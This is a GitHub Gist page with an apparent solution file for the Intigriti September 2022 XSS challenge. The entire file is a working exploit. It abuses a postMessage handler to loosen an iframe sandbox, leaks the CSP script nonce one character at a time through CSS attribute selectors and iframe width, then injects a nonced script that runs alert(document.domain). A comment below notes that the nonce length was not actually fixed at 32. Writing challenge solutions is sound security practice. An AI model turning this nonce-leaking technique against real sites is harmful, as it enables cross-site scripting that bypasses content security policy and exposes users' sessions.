Created
September 26, 2022 06:49
-
-
Save strellic/410d554126bf7ffa92f9a9539b673682 to your computer and use it in GitHub Desktop.
intigriti-0922-sol.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <iframe src="https://challenge-0922.intigriti.io/challenge/index.php" style="width:100vw; height: 100vh"></iframe> | |
| <script> | |
| document.querySelector("iframe").onload = () => { | |
| document.querySelector("iframe").contentWindow.frames[0].location = URL.createObjectURL(new Blob([` | |
| <script> | |
| (async () => { | |
| let alphabet = "0123456789abcdef".split(""); | |
| let known = ""; | |
| window.parent.postMessage({ | |
| action: "set", | |
| element: "iframe", | |
| attr: "sandbox", | |
| value: "allow-scripts allow-same-origin allow-modals" | |
| }, "*"); | |
| while(true) { | |
| console.log(known); | |
| for(let c of alphabet) { | |
| window.parent.postMessage({ | |
| action: "set", | |
| element: "script[nonce^='" + known + c + "'] ~ div iframe", | |
| attr: "style", | |
| value: "display: block; width: " + (100 * alphabet.indexOf(c)) + "px" | |
| }, "*"); | |
| } | |
| await new Promise(r => setTimeout(r, 100)); | |
| known += alphabet[window.innerWidth / 100]; | |
| if (known.length === 32) { | |
| break; | |
| } | |
| } | |
| window.parent.postMessage({ | |
| action: "set", | |
| element: "iframe", | |
| attr: "srcdoc", | |
| value: "<script nonce='" + known + "'>alert(document.domain)</sc" + "ript>" | |
| }, "*"); | |
| })(); | |
| </scr` + `ipt> | |
| `], {type: "text/html"})); | |
| } | |
| </script> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Just so you know the nonce length was not fixed to 32.